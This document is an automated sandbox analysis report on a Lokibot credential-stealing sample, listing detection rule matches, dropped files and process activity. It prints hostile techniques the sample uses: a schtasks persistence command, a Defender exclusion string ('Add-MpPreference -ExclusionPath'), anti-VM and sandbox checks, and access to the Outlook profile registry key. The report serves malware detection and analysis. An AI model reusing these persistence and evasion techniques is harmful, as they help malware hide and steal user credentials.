                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile created: C:\Users\user\AppData\Roaming\UieOsrSocP.exeJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMutant created: \Sessions\1\BaseNamedObjects\pkPskRKRiL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_01
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D57.tmpJump to behavior
                Source: 2CW1YLhNIS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: 2CW1YLhNIS.exeReversingLabs: Detection: 26%
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile read: C:\Users\user\Desktop\2CW1YLhNIS.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe 'C:\Users\user\Desktop\2CW1YLhNIS.exe'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: 2CW1YLhNIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 2CW1YLhNIS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: 2CW1YLhNIS.exeStatic file information: File size 1219072 > 1048576
                Source: 2CW1YLhNIS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x117a00
                Source: 2CW1YLhNIS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                .NET source code contains potential unpackerShow sources
                Source: 2CW1YLhNIS.exe, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: UieOsrSocP.exe.0.dr, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.2CW1YLhNIS.exe.8f0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.2CW1YLhNIS.exe.8f0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.2.2CW1YLhNIS.exe.c90000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.2CW1YLhNIS.exe.c90000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F63F7 push 00000028h; retf 0000h
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7043B pushad ; iretd
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA79DB push dword ptr [edx-04h]; iretd
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C963F7 push 00000028h; retf 0000h
                Source: initial sampleStatic PE information: section name: .text entropy: 7.17424045556
                Source: initial sampleStatic PE information: section name: .text entropy: 7.17424045556
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile created: C:\Users\user\AppData\Roaming\UieOsrSocP.exeJump to dropped file

                Boot Survival:

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 6000Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 5940Thread sleep time: -43657s >= -30000s
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 4460Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 1644Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 43657
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 60000
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE
